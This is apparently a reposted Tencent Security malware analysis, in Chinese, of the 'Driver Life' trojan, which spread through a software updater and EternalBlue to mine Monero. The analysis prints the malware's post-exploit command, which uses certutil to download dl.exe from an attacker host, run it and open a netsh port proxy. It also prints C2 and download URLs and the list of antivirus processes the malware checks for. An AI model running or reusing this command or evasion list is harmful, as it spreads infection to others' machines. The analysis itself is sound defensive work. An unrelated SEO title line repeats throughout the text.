qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,在中毒电脑进行门罗币挖矿。

腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,在中毒电脑进行门罗币挖矿。

一、概述

12月14日下午,腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。

“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,在中毒电脑上进行门罗币挖矿。云控木马对企业信息安全威胁巨大,企业用户须重点关注。

该病毒爆发刚好是周末时间,令企业网管猝不及防,周一工作日员工电脑开机后,建议立刻查杀病毒,再使用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户使用腾讯电脑管家即可防御。

本次病毒爆发有三个特点:

1.驱动人生升级通道传播的病毒会在中毒电脑安装云控木马;

2.病毒会利用永恒之蓝漏洞在局域网内主动扩散;

3.通过云端控制收集中毒电脑部分信息,接受云端指令在中毒电脑进行门罗币挖矿。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

木马攻击流程图

二、详细分析

dtlupg.exe访问以下url下载病毒

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

(注意,为避免网友点击以上链接可以直接下载病毒程序,对部分字符做了隐藏处理)

病毒文件释放在:

C:Program Files (x86)DTLSoftriliUpdaterctrlf
f79cb9d2893b254cc75dfb7f3e454a69.exe等位置执行。

f79cb9d2893b254cc75dfb7f3e454a69.exe 运行后最终释放出 C:WINDOWSTempsvvhost.exe

(MD5:
2E9710A4B9CBA3CD11E977AF87570E3B)运行,svvhost.exe打包了“永恒之蓝”等漏洞攻击工具在内外网进一步扩散。

2.1 病毒母体

F79CB9D2893B254CC75DFB7F3E454A69.exe

运行后将自身拷贝到C:windowssystem32svhost.exe,安装为服务并启动,服务名为Ddiver,并在随后拉起云控模块svhhost.exe、攻击模块svvhost.exe。

运行时先检测互斥体,确定是否已感染过。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

通过检测以下进程将杀软信息搜集准备上传。

360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

检测到任务管理器及游戏进程则将云控模块svhhost.exe退出。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

打开互斥体,对象名称为”I am tHe xmr reporter” ,xmr意指xmrig.exe矿机。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

搜集系统敏感信息上传到hxxp://i.haqo.net/i.png,并接受返回的云控代码等待执行。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

母体设置进程共享内存HSKALWOEDJSLALQEOD

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

2.2 挖矿

云控木马svhhost.exe其主要功能是,从母体进程svhost.exe共享内存中读取shellcode解密并执行,每隔2000秒读取一次共享内存中的shellcode进行解密执行,共享内存名为HSKALWOEDJSLALQEOD,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

云控木马执行流程

云控木马运行后会创建一个线程,该线程函数主要功能是判断进程svhost.exe(母体进程)是否存在,不存在的话则启动该进程,接下来要读取的共享内存数据就是从该进程进行读取

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

创建线程判断母体进程是否存在

调用OpenFileMappingA打开共享内存,读取共享内存数据

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

读取共享内存数据

调用RtlDecompressBuffer函数解压共享内存中的数据,为下一步执行做准备

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

解压共享内存数据

共享内存数据加压完后会执行,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

执行shellcode

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

尝试挖矿时通信IP为172.105.204.237

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

2.3 攻击模块

攻击模块从地址
hxxp://dl.haqo.net/eb.exez下载,作为子进程Svvhost.Exe启动,分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序。

子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

Mysmb.pyo为攻击时扫描代码。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

GitHub上也可以看到相关开源代码

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

扫描内网445端口进行攻击

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

不仅攻击内网漏洞机器,还随机找几个外网IP尝试攻击,1次攻击完后沉默20分钟

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

安全建议

1. 服务器暂时关闭不必要的端口(如135、139、445),方法可参考:
https://guanjia.qq.com/web_clinic/s8/585.html

2. 企业用户在周一上班后,建议使用腾讯御点查杀病毒(个人用户可使用腾讯电脑管家),然后使用漏洞修复功能,修复全网终端存在的系统高危漏洞;

3. 服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

4. 使用杀毒软件拦截可能的病毒攻击;

5. 推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。

qqpcrtp是什么进程(阻止电脑自动安装软件的方法)

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,请发送邮件至 55@qq.com 举报,一经查实,本站将立刻删除。转转请注明出处:https://www.szhjjp.com/n/26334.html

(0)
nan
上一篇 2021-09-18
下一篇 2021-09-18

相关推荐

  • 局域网软件主要由什么组成(最好的局域网文件共享软件推荐)

    昨天有小伙伴留言推荐CxFileExplorer安卓手机文件管理器,所以今天安排上。安卓手机基本上都自带了文件管理器应用,不过因为功能比较弱,如不能同局域网传送文件,所以一些小伙伴会选择其它文

    2022-01-11 科技
    0
  • u盘不能格式化的解决方法(u盘无法格式化工具)

    刚才小编打开自己的邮箱发现有用户给我发邮件求助了,这些求助的问题是格式化u盘失败,寻求解决方法,其实格式化u盘失败这个问题是比较常见的问题,接下来就来看看我是怎么处理这个问题的吧!u盘不能格式化怎么办1.以win7系统为例说明,讲u盘

    2021-12-11 科技
    0
  • 如何制作u盘系统盘还原(u盘做系统盘详细步骤)

    对于使用Windows的普通用户来说,安装操作系统一般都是采用光盘安装的方式,不过对于13寸以下的便携小本来说,通常都没有配置光驱。其实,我们完全没有必要依赖光驱,通过U盘安装操作系统是一种非常实用的方式,下面分享两种使用U盘安装系统的方法。方法1:

    2021-10-01 科技
    0
  • 交互设计规范文档原则(交互设计7大原则)

    前几天小麸给大家带来了关于建筑作品集相关准备的干货内容,今天就来分享一波大家也比较关心的交互设计~01框架设计准备作品集的时候,很多同学会思考说,我应该放什么在项目当中?对于跨专业的同学来说,可以放1-2个交互设计方向的作品,其他放原专业的作品就可

    2021-09-18 科技
    0
  • 保卫萝卜挑战28关攻略图解(保卫萝卜精灵蝠获得方法)

    双出口的28关等着各位萝卜丝们呢!不要怕,阿波来给你们开道,看看游乐场28关有什么幺蛾子。本关可以使用的炮塔有便便、蘑菇、章鱼和魔法球,减速辅助类的便便和蘑菇都不是很好的炮塔,相比之下还是蘑菇靠谱一点吧,输出类的可以考虑章鱼炮塔,毕竟是清理障碍物最好

    2021-09-04 科技
    0
  • win7未能成功安装设备驱动的原因(win7无法完成安装若要)

    Win7系统提示未能成功安装设备驱动程序怎么办?有用户在安装打印机后,无法成功安装打印机驱动,下面就给大家介绍电脑安装设备驱动程序失败的解决方法。解决方法:1.在桌面上点击【计算机】右键,选择【管理】,再选择【设备管理器】。如图所示:

    2021-12-11 科技
    0

发表回复

登录后才能评论